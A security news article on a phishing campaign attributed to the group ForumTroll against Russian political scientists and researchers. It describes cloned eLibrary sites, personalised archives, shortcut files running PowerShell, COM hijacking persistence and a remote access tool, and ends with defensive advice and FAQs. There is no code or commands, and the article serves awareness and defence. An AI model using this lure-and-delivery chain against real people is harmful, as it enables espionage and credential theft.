Phishing campaign targets Russian researchers using Chrome exploit tactics

The operation shows continued focus on credential theft and malware delivery through tailored academic lures.

What happened

According to Cyber Security News, researchers have reported that the threat group known as Operation ForumTrol launched a new phishing campaign targeting Russian political scientists and academic researchers. The campaign follows earlier activity linked to the exploitation of a Chrome zero-day vulnerability tracked as CVE 2025 2783. Researchers said the latest operation relied on phishing emails impersonating the scientific library's eLibrary and directed victims to download fake plagiarism reports hosted on attacker-controlled infrastructure.

Going deeper

Unlike earlier campaigns that focused on organizations, this wave targeted individual scholars at universities and research institutes. Emails were sent from addresses designed to resemble legitimate academic support contacts and linked to cloned versions of the eLibrary website. Each victim received a customized archive named with their full name, which increased credibility and reduced suspicion. The attackers registered the malicious domain months before launching the campaign, allowing it to age and blend into normal traffic. The website restricted repeated downloads and adjusted behavior when accessed from non-Windows systems, which complicated analysis and reduced accidental exposure.

What was said

Researchers said the downloaded archives contained shortcut files that executed PowerShell scripts when opened. These scripts retrieved additional payloads from the attacker’s server and installed them in locations that mimicked legitimate Windows components. Persistence was achieved through registry-based COM hijacking, a technique previously observed in earlier ForumTrol activity. Once established, the malware deployed a commercial remote access framework while displaying a decoy plagiarism report to maintain the illusion of legitimacy.

The big picture

According to GBHackers, analysts assess that ForumTroll is unlikely to slow down and will likely continue targeting Russian and Belarusian organizations and individuals. The group is expected to rely on a combination of zero-day exploits and well-crafted social engineering campaigns to maintain access to sensitive environments.

GBHackers noted that ForumTroll has shown “operational continuity since at least 2022,” and has access to commercial spyware frameworks such as Dante, alongside red-team tooling like Tuoni. That mix, researchers warned, positions the group as a “persistent and evolving threat” to high-value targets across Eastern Europe.

The report also advises organizations to focus on practical defenses, including training employees to verify messages that appear to come from trusted platforms, monitoring known ForumTroll infrastructure indicators, and strengthening email authentication controls to reduce impersonation risk.

FAQs

Why are academic researchers frequent targets of phishing campaigns?

They often handle sensitive research, policy analysis, and international communications, which can be valuable for intelligence collection.

How does domain aging help attackers?

Registering domains months in advance helps them avoid spam filters and appear more legitimate when the campaign begins.

Why were attacks tailored to individual victims?

Personalized file names and context reduce suspicion and increase the likelihood that targets will open malicious files.

What role did PowerShell play in the attack?

PowerShell was used to download and execute additional payloads without relying on traditional executable files.

How can universities reduce exposure to similar threats?

They can limit script execution, monitor shortcut file abuse, educate researchers on targeted phishing, and restrict access to untrusted external links.